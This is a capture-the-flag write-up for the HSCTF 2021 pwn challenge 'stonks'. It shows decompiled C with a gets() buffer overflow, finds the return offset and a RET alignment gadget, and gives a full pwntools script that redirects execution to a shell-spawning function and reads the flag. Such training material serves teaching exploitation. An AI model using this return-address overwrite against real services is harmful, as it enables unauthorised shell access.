## stonks

* **CTF:** HSCTF 2021
* **Category:** pwn
* **Points:** 391
* **Author(s):** b0uldrr
* **Date:** 20/06/21

---

### Challenge
```
check out my cool stock predictor!

nc stonks.hsc.tf 1337
```

### Downloads
* [chal](chal) 

---

### Solution

*This was a very standard beginner CTF BOF exercise. However, of note, the stack needed to be re-aligned for the payload to work with a extra `RET` gadget.*

I opened the challenge binary in Ghidara and found the following relevant functions. I summary:
* `main` just calls `vuln`
* `vuln` is vulnerable to a buffer overflow through the use of a `gets()` call.
* `vuln` calls `ai_calculate`, whic does nothing interesting
* Also in the source is `ai_debug`, which spawns a shell, but it's called as part of the normal flow of the program. 

```c
undefined8 main(void)

{
  puts("Advanced AI Stock Price Predictor");
  vuln();
  puts("Thanks for using the Advanced AI Stock Price Predictor!");
  return 0;
}
```

```c
void vuln(void)

{
  char local_28 [28];
  uint local_c;
  
  printf("Please enter the stock ticker symbol: ");
  gets(local_28);
  local_c = ai_calculate();
  printf("%s will increase by $%d today!\n",local_28,(ulong)local_c);
  return;
}
```

```c
int ai_calculate(void)

{
  int iVar1;
  
  iVar1 = rand();
  return iVar1 % 0x14;
}
```

```c
void ai_debug(void)

{
  system("/bin/sh");
  return;
}
```

Our challenge was the overflow the `vuln` function to point the return address to `ai_debug`.

Get the address of `ai_debug` to return to:
```
$ objdump -d chal | grep ai_debug
0000000000401258 <ai_debug>:
```

Determine the overflow offset of the return address:
```
$ gdb chal
gdb-peda$ pattern create 100 pattern.txt
gdb-peda$ r < pattern.txt
gdb-peda$ x/wx $rsp
gdb-peda$ pattern_offset 0x41304141
1093681473 found at offset: 40
```

My payload wouldn't work when I first tried it. It would spawn a shell which would immeidately die. After a bit of research I found that I needed to align my stack. See here for more info (https://gr4n173.github.io/2020/07/11/ret2libc.html)

List all gadgets in the challenge binary and find a simple `RET` call.  I found one at `0x40101a`:
```
ROPgadget --ropchain --binary chal
```
```
0x000000000040101a : ret
```

My complete solution:

```python
#!/usr/bin/python3
import pwn

local = False
if local:
    conn = pwn.process('./chal')
else:
    conn = pwn.remote('stonks.hsc.tf', 1337)
    
conn.recvuntil('Please enter the stock ticker symbol: ')

buf  = b'a' * 40           # overflow with junk up to and including the base pointer
buf += pwn.p64(0x40101a)   # RET gadget to align the stack
buf += pwn.p64(0x401258)   # write the address of ai_debug() over the return instruction address on the stack

conn.sendline(buf)
conn.interactive()
```

Running it spawns a shell:
```
$ ./soln.py
[+] Opening connection to stonks.hsc.tf on port 1337: Done
[*] Switching to interactive mode
aaaaaaaaaaaaaaaaaaaaaaaaaaaa\x03will increase by $3 today!
$ cat flag
flag{to_the_moon}
````
---

### Flag 
```
flag{to_the_moon}
```
